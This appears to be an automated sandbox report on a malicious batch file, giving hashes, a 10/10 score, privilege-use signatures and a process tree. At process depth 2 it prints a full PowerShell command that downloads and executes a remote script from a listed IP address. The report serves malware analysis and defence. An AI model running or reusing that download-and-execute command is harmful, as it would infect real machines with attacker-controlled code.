Analysis
max time kernel: 108s
max time network: 149s
platform: windows10_x64
resource: win10v200217
submitted: 17-03-2020 17:10
Static task: static1
Behavioral task: behavioral1
  Sample: ydPBfFLN.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: ydPBfFLN.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: ydPBfFLN.bat
Size: 196B
MD5: 50fdb1991ec03a3aa2a0e43f003b45fa
SHA1: fd5349455dc0e38995beffbb501656e0cb76b8f3
SHA256: 36b783132e9054391ec692f5470a2e2b0a9cdce7a09018477bb7eeefa7fc6739
SHA512: e7f5f38700f49162fae8c8f3a0ac9a06cac833321c2c39235f10c711c69de29dc9c4dca5806bd89810e1e2fcdbd3e0e3cd2a4e76ba2965baac703d7aeb0f1b82
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
  ps1.dropper  http://185.103.242.78/pastes/ydPBfFLN
Signatures
Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3636  3616        WerFault.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3636  WerFault.exe
  Token: SeBackupPrivilege   3636  WerFault.exe
  Token: SeDebugPrivilege    3636  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3636  WerFault.exe (14 occurrences)
Processes
Depth 1: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ydPBfFLN.bat"
  PID: 3924
Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ydPBfFLN');Invoke-MWMIOGLDAXQVF;Start-Sleep -s 10000"
  PID: 3616
Depth 3: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 704
  PID: 3636
  Signatures:
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses